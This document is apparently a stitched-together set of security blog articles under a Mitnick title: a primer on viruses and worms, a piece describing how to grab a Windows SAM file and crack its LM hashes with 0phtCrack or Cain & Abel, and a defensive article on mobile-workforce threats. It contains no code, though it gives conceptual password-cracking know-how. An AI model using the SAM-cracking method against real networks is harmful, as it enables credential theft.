Kevin Mitnick - Life a Computer Hacker

Brief Virus Introduction

In day today life most of computers get attacked or infected with the viruses or worms. 4% attacks are due to viruses and worms are reported, rest are due to human error (53%) and so on.

But that 53% also includes viruses and worms which get attaché to our system due to human error. So, whatever be the matter , every computer user should at least know the basics of viruses and worms and how one can try to avoid such stuffs from the system.

What is a Virus?

A virus is a self replicating code that produces its own code by attaching copies of itself into other executable codes and operates without the knowledge or desire of a computer user.
Virus was discovered in early 1980s. Viruses require human activity such as booting a computer, executing an autorun on a CD, or opening an email attachment. There are three basic ways viruses propagate through the computer world:
Master boot record : This is the original method of attack.. It works by attacking the master boot record of floppy disks or the hard drive. This was effective in the days when everyone passed around floppy disks.

* Document Virus: A slightly newer form of virus that relies on the user to execute the file.. Extensions, such as .com and .exe, are typically used. Some form of social engineering is normally used to get the user to execute the program. Techniques include renaming the program or trying to mask the .exe extension and make it appear as a graphic or .bmp.

* Macro Virus: The most modern type of virus began appearing in the 1990s. Macro viruses exploit scripting services installed on your computer. Most of you probably remember the I Love You virus, a prime example of a macro infector.
Viruses must place their payload somewhere so that they can overwrite a portion of the infected file. Most virus writers want to avoid detection for as long as possible One way the virus writer can accomplish this is to place the virus code either at the beginning or end of the infected file. Prependers infect programs by placing their viral code at the beginning of the infected file. Appenders infect files by placing their code at the end of the infected file.. This leaves the file intact while the malicious code is added to the beginning or end of the file or append at both sides.

Component/Working of a Virus:
components of virus



Viruses that can spread without human intervention are known as worms.

->The search routine is responsible for locating new files, disk space, or RAM to infect
-> Infection Routine is responsible for copying the virus and attaching it to a suitable host.
->Trigger Routine: is to launch the pay-load at a given date and time. The trigger can be set to perform a given action at a given time.

Characteristics of Virus

* Virus resides in the memory and replicates itself.
* It does not reside in the memory after completing its task
* It may transform itself into other programs to hide its identity

Reason for the creation of Viruses:

* It may be created for research purpose
* May be to play pranks with friend and foes what we usually do J
* Someone may intentionally wish to harm others computer i.e. vandalism
* To gain over some companies content for financial or threat purpose i.e extortion
* To have an eye over the people say in a computer lab or on any product distribution i.e
Spyware.

* For spreading threats and terrors at the people through internet by thefting others identity and misusing that and many more may be the reason.

Symptoms that computer get an attack

* System will work in unmannered way
* Process may take more time that its expected.
* floppy drive or disk drive suddenly get opened
* Hang up at the starting time.
* Computer name gets changed.
* Drive names get changed
* Firefox or other browsers not working properly
* Getting sudden restart or freezes fast on warning
* Other gets vulgar messages what you have not sent to them and so on.

Basic Difference between Virus and worm:

* A worm is a special kind of virus that can replicate itself and use memory, but don’t attach itself to other programs what a virus does.
* A worm spread through the infected network automatically but virus does not.

Types of Viruses:

* What they infect
Boot virus: infects disk boot sectors and records.
File Virus: infects executables files in OS file system.
Macro Virus: infects documents, data sheets etc like word, excel
Network Virus: spread through email using command and protocols of computer network.
Source Code Virus: override host codes by adding Trojan code in it
* How they infect
Parasitic Virus: attach itself to executable files and replicates itself
Memory resident Virus: resides and do changes in main memory
Stealth Virus: which can hide itself from anti-virus programs
Polymorphic Virus: A virus that mutates and changes accordingly.
Cavity Virus: overwrites a host file with constant null but with the same size and functionality

Famous Viruses and Worms:

I love you which is a win-32 email based worm
Melissa Virus: it’s a Microsoft word macro virus
JS.spth: It’s a javascript internet worm which spreads through e-mail, p2p networks etc.
Klez virus: its an email attachment that automatically runs when viewd with MS word and uses its own SMTP engine to spread mail
Slammer/Sapphire worm: it was the fastest worm in history which doubles itself within 9 seconds.

others are top rated viruses

detnat, netsky, mytob , bagle, mywife, virut, Zafi, mydoom, Lovegate and bagz.
Always remember Prevention is better than cure so don’t accept strange files, don’t do double click on everything, try to check file’s extension and learn little bit batch file commands.
Install good antivirus(Nod32, AVG, McAfee, Bitdefender , Kaspersky etc.) and regulary scan your whole sytem, always try to check processes and all.
For more information check Wikipedia , howstuffsworks.com , Ec-council CEH guide and don’t forget to google to get latest news and stuffs related to this topic. This was just an introduction!

How to crack a corporate network in 60 seconds!

Ever seen the movie gone in 60 seconds? Well in the same way it is easy to steal a car, it is just as easy to steal passwords off a corporate network. Since the vast majority of corporate networks run Microsoft software such as Windows, it makes the task easy. Most enterprises are slow to upgrade even in situations where Microsoft told them to upgrade to Active Directory and that they will no longer be supported. Their lack of aggressiveness turns into an opportunity for those who want to crack a network in 60 seconds.

Lets look at the fastest way this can be accomplished...

Let me stand on my soapbox for a moment. If you are still running Windows NT and are a network administrator and/or responsible for IT security, go to your boss and ask him/her to fire you immediately!

The best way to attack a Windows network is to get hold of the Windows SAM file. The SAM file holds username, user ID (SID) and hashed passwords for all users. Once you have gotten a copy, you can use tools such as 0phtCrack and Cain & Abel. These tools can crack passwords in about eight hours. While not sixty seconds it is sufficient for most needs.

I have to keep my promise of telling you how to do it in sixty seconds though. In order to understand how it will be accomplished, you need to understand a little about how the SAM file is protected. First of all, the hashing routine used by SAM is based on the DES algorithm. Essentially, a 32 byte hash is generated from the password as follows:

• Convert the password to uppercase


• Truncate the password to 14 characters. If shorter then pad


• Split the password into two 7 character halves and generate two 16 byte hashes using DES algorithm


• Concatenate the two 16 byte hashes to form the 32 byte hash

If you understood the above steps, you would realize that cracking is reduced to cracking on or possibly two 7 character passwords without regard to case. This makes the number of combinations incredibly small.

To make the problem space even smaller, there are two different approaches one can use. The first is a dictionary-based approach where weak passwords are defined as any dictionary word or lame permutation of a dictionary word such as "password9". Precomputed hashes can be compared since the vast majority of users will use real words in their passwords instead of random character sequences (Security folks don't think for a second that changing your security policy is the answer). Secondarily, if you are on a non-switched network, a clever individual can use NetMon to sniffer the hashes off the wire.

Using this technique on a Pentium 4 3.2 Ghz machine (I have a Gateway), it takes 10 seconds to load the dictionary into memory but less than one second to actually crack the password. Subsequent runs will also take less than one second!

If you want to make it more difficult to perform this type of attack on your network, please see the following Microsoft Knowledge base articles.

• Local Security Policy - 147706


• Disabling hashing - 299656


• Group policy enforcement of strong passwords - 225230

More from this author

• Online fraud tutorials... from the Secret Service

• Cracking techniques for disgruntled employees (Part Two)

• Thoughts on the CAN-SPAM Act

• One Architect's Opinion on ESB

• Cracking techniques for disgruntled employees (Part One)

Strictly for knowledge purpose only

The Ethical Hacker Network - Step-By-Step Hacking

Everyone talks about the ability to hack computers via wireless technology, but have you ever actually SEEN someone do it? Well you're about to. The Step-By-Step Hacking Video will show exactly how a laptop without the proper security protection can be attacked and exploited. In a manner of mere minutes, we can own an unprotected or out-of-date system. The video actually shows the exact procedures that a hacker could utilize to gain access to a mobile system and eventually a corporate network. Steps and technologies to prevent such an attack are presented throughout the video and are the focus of this article. NOTE: While it may seem that the first few minutes of the video are unexciting – just wait – you are being setup!

This article is broken up into two sections. The first section quantifies the different threats to which mobile computer systems are susceptible. The second portion defines the fundamental methodological steps that hackers take in trying to exploit computer systems directly and details how each step could be thwarted. These fundamental steps are also used in the video.

Today’s mobile workforce poses significant security challenges to corporations. With workers accessing corporate resources from public wi-fi hotspots, hotels, home wi-fi and broadband networks, etc., the need for a comprehensive mobile workforce security solution is becoming a necessity. This is an extraordinary challenge considering the additional complexity of the mobile workforce being a moving target and with security budgets and personnel constantly being downsized.

To implement an ideal mobile workforce solution, it is important to understand the actual threats. These threats fall into three main categories:

Malware

Most consumers think of viruses when it comes to malware and believe that an antivirus software solution will address all malware threats. Those of us in the industry realize that it is much more complex. For antivirus solutions to be effective, they need to be running and the virus definitions need to be up-to-date. This can be a significant challenge with a mobile workforce that is not always online when automatic updates are performed. To protect yourself from malware, please consider the following:

• In addition to antivirus software, antispyware applications are necessary to address the malware threat. Keeping these applications running and up-to-date poses the same difficulty as antivirus updates.

• Another important tool to combat malware is an enterprise-grade personal firewall with IDS/IPS capability. This is important because antivirus and antispyware applications are reactive and based upon recent definition files. Conversely, an enterprise-grade personal firewall with IDS/IPS capability has the ability of performing zero day protection, where malicious behavior can be intelligently identified and stopped as it occurs.

• An often-overlooked means to prevent the risk from malware is ensuring that the remote endpoints have the latest operating system and application security patches and that the remote system is properly configured from a security perspective. This is important because malware will often take advantage of system and application vulnerabilities that would not be present if the system were up-to-date with patches and properly configured.

• It is also important to note that there is a significant risk that anti-antivirus and anti-personal firewall malware will disable the security applications that corporations put into place. Consequently, it is important to have a check take place to ensure that these applications are running and up-to-date and if they are not, access to the Internet, corporate network, etc. should be denied and the deficiency remediated. The logic for such checking and remediation should reside on the remote endpoint, as today’s systems need to be in compliance with security policies at all times. In the past, corporations have relied upon VPN Concentrators or Cisco NAC-type functionality to check the security posture of the remote endpoint as it is gaining access to the corporate network. With today’s mobile workers spending 80% of their time not VPN’d into a corporate network, this way of checking the state of the system’s security posture is inadequate.

Sniffing

A mobile worker constantly has the threat of their data being sniffed. Sniffing can fall into two fundamental categories:

• Sniffing of Credentials – Corporations are moving to a model where a single application is being used to provide dial-in, wi-fi, broadband, mobile data (CDMA, EVDO,), etc. access. In doing so, there is an advantage to having authentication for all of these different transports proxied back to a central location, commonly the corporation's network. Often, these authentication credentials are the remote user’s network credentials, or some other credentials that have significant value to the end-user and corporation. Consequently, it is very important to ensure that these credentials are protected during the proxy process. With standard RFC Compliant RADIUS Proxy (A commonly used authentication protocol), the username is always sent in the clear and the password is hashed with MD5, then un-hashed and re-hashed on each RADIUS server through which the credentials pass.

• Sniffing of Data – With workers using public and private wi-fi and hotel broadband Internet access, the threat of an unwanted party sniffing application traffic is a very real concern. In virtually all cases, public wi-fi locations and hotel broadband locations do not offer any forms of inherent encryption for data leaving a system on these networks, while at the same time making these networks readily available to a number of simultaneous users. The best way to protect against the sniffing of data is to ensure that a VPN tunnel is active throughout the life of the public wi-fi and hotel broadband network connection. Doing this and disabling split-tunneling will ensure that all data leaving the remote system will be encrypted via the VPN client, which commonly would use DES, 3DES or AES encryption.

Direct Attack

The most dangerous form of attack is a direct attack. This is because a hacker can use their cognitive skills to exploit a remote system and to leave the remote system vulnerable in the future. They can also consciously dissect and analyze data on the remote system. There are a number of key security steps to implement to protect against a direct attack:

• Remote systems need to be up-to-date with security patches and properly configured. Hackers gain direct access to remote endpoints by running exploits that take advantage of vulnerabilities on the remote system that would not be present if the system were properly patched and properly configured. Ensuring a mobile workforce has the latest patches and is properly configured is one of the biggest security challenges to organizations. Virtually all of the patching systems in place today do not provide a means to remediate the remote system by actually pushing the necessary patch or configuration to the system when the endpoint is not connected directly to or VPN’d into the corporate network. With end-users spending 80% of their online time not VPN’d into the corporate network, that leaves a significant gap.

• Ensuring the remote endpoint has an enterprise-grade personal firewall that is running, properly configured and up-to-date. This firewall would not only prohibit a hacker from accessing the remote systems, it would also provide stealth capabilities to help make the endpoint invisible to scans.

• Being purposely redundant, antivirus and antispyware applications need to be running and up-to-date. An outdated security application will not provide protection against newly developed malware. Commonly, a hacker will place malware on a victim’s machine to either further exploit it, or to provide a means to exploit it in the future. An endpoint that is constantly scanning for the existence of such malware will be able to detect when this takes place and perform the necessary actions to address the threat.

Step-by-Step Guide to the Fundamental Steps Performed in the Video and How to Combat Them

Footprinting and Scanning

The first step is finding a live system. There are many tools available on the Internet to search for live targets. To protect against footprinting and scanning, use an enterprise-grade, properly configured and running personal firewall. This is the best means to protect your mobile systems from even being seen during a scan.

Enumeration

Once a target is found, more information needs to be gathered to determine the best approach for exploiting it. Just as there are many scanning tools available free on the Internet, there are many enumeration tools available. There are two main steps that should be implemented to prevent enumeration from taking place:

• Ensuring that a properly configured enterprise-grade firewall is present and operational.

• Ensuring that the remote operating system is properly configured, so that it does not disclose this type of information.

Launching an Attack

Once a live system is found and information is gathered about it, a direct attack can be launched against the system. There are a number of steps that can be taken to prevent a direct attack:

• Ensuring your remote systems have the latest operating system and application security patches. When hackers launch an attack against a system they do so using exploits that take advantage of vulnerabilities on the remote system that commonly would not be present if the remote systems was up-to-date with security patches.

• Ensuring that a properly configured enterprise-grade firewall is present and operational.

• Ensuring that antivirus and antiSpyware are running, utilizing real-time scanning and are up-to-date on your remote systems. It is a common tactic for hackers to place trojans and other malware on hacked systems and having these programs actively scanning would help catch situations where this malware is being transferred to the hacked machine.

Leaving the Remote System Vulnerable to an Attack

Once a hacker has exploited the system, they will commonly take steps to leave it vulnerable to future attacks. This can be done by installing a trojan or remote control software, installing a key logger that routinely sends all keystrokes from the system, etc. To protect against this step:

• Ensuring an enterprise-grade personal firewall is running, properly configured and up-to-date. This can stop a remote connection from taking place and sense when malicious activities are taking place.

• Ensuring that antiSpyware and antivirus applications are running, and up-to-date. In doing so, these security applications would be able to find address and malware left behind to further exploit the system.

I hope this helps shed light on the hacking process and has given you ample information to help you protect your own corporate networks including those ever slippery mobile workforce machines.